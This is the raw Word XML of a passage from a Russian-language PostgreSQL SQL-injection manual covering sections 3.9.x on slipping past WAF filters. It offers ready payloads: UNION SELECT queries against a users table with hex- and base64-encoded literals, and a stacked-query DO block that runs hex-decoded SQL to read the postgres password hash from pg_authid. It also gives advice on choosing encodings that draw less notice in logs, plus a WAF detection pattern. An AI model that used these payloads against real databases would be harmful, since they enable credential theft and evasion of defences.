          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — E-strings и hex/octal-escape с 8.0; Unicode-escape (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\uNNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) в E-string — с 9.0.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везде. Это лексическая фича.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 `standard_conforming_strings`:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с 9.1; почти везде в проде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если кластер сконфигурирован с </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(legacy/совместимость) — escape-обработка применяется и к обычным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-литералам без E-prefix, что само по себе создаёт дополнительные SQL-injection векторы (escape-байты в обычных litterals превращают, например,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в перенос строки → 3.12.2).</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3.9.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unicode-escape. Тот же класс задачи (кодировать содержимое в codepoint-ы), другой синтаксис. Выбор по фильтру: если режется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 использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; если режется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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-конкатенация. Альтернативный путь — через function call, а не escape-литерал.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3.9.5</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convert_from(decode('...', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ещё компактнее для длинных строк (один hex-литерал на всю строку, без побайтовых escape).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переводы строк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в комментариях. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\r\n'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный способ вставить literal CRLF в SQL-payload без использования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(13)||chr(10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Главный синтаксис для атак на парсер комментариев.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3.12.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-8715 (newline в идентификаторе при pg_dump/restore). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\n'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-атаки в значениях, попадающих в имена объектов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точка пересечения с 3.16.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E['"]\\(x[0-9a-fA-F]|\d{3})</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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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String Constants With C-Style Escapes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standard_conforming_strings GUC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Character Types — text and NUL bytes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hex/octal encoding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E-string escape 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CVE-2006-2313 — historical context: standard_conforming_strings introduced as security mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.5 convert_from(decode(...)) — hex/base64-encoded строки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Из WAF 3.9.0:</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\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — подстрока имени; кодируется в hex/base64 целиком.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные классы фильтров, которые сильнее 3.9.2/3.9.3/3.9.4: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с детектором длинных chr-цепочек</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chr(N)||chr(N)||...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> распознаётся (сигнатура CRS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">942100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); один </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode('70675f...', 'hex')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нет.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с детектором escape-литералов</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convert_from</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decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функционально похожи на текстовую конвертацию, в большинстве WAF не флагуются (часто используются легитимно для UTF-8 normalisation, base64-encoded payload-ов в API).</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 удаляющий backslash и/или E-prefix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decode('hex')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не использует backslash; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">convert_from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-вызов выглядит как обычная UTF-8-функция.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципиальное ограничение то же, что у 3.9.2/3.9.3/3.9.4: даёт строковое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не SQL-токен. Для имени функции/таблицы — через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 DO-блоке.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Компактность по сравнению с другими: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Приём</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Запись `'pg_authid'` (9 символов)</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Длина</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chr (3.9.2)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`chr(112)\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Unicode (3.9.3)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U&amp;'\0070\0067\005F\0061\0075\0074\0068\0069\0064'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E-string hex (3.9.4)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E'\x70\x67\x5F\x61\x75\x74\x68\x69\x64'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decode hex (3.9.5)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convert_from(decode('70675f617574686964','hex'),'UTF8')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53</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decode base64 (3.9.5)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convert_from(decode('cGdfYXV0aGlk','base64'),'UTF8')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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для коротких строк выигрыш у E-strings; для длинных (≥ 30 символов) — у decode-форм, потому что нет повторяющихся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x</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U+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-префиксов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — hex-decoded для содержимого литерала</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — фильтр блокирует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 WHERE email = convert_from(decode('61646D696E40636F2E636F6D', 'hex'), 'UTF8') --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = convert_from(decode('61646D696E40636F2E636F6D', 'hex'), 'UTF8') --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode('61646D696E40636F2E636F6D', 'hex')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со значением байтов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x61 0x64 0x6D 0x69 0x6E 0x40 0x63 0x6F 0x2E 0x63 0x6F 0x6D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convert_from(..., 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретирует эти байты как UTF-8 и возвращает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'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WAF в payload-тексте подстроки нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для генерации hex на стороне атакующего: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n 'admin@co.com' | xxd -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin@co.com'.encode('utf-8').hex()</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B — base64-decoded (когда hex заметнее в логах)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Логи приложения часто включают request-параметры; длинная hex-строка визуально подозрительна. Base64 выглядит «безобиднее» и при разборе вручную часто скипается (привычка: «base64 — обычное кодирование данных»).</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 WHERE email = convert_from(decode('YWRtaW5AY28uY29t', 'base64'), 'UTF8') --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = convert_from(decode('YWRtaW5AY28uY29t', 'base64'), 'UTF8') --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Семантика идентична Payload A. Генерация base64: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n 'admin@co.com' | base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">base64.b64encode(b'admin@co.com').decode()</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C — decode + EXECUTE для имени функции/каталога</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полный аналог Payload B из 3.9.2 (chr-вариант), но компактнее. Контекст — payload в точке инъекции, допускающей stacked queries или DO-блок:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1; DO $do$ BEGIN EXECUTE convert_from(decode('53454C4543542072 6F6C70617373776F72642046524F4D2070675F61757468696420574845524520726F6C6E616D653D27706F73746772657327', 'hex'), 'UTF8'); END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(пробел в hex для читаемости; на самом деле строка идёт сплошняком, см. ниже)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
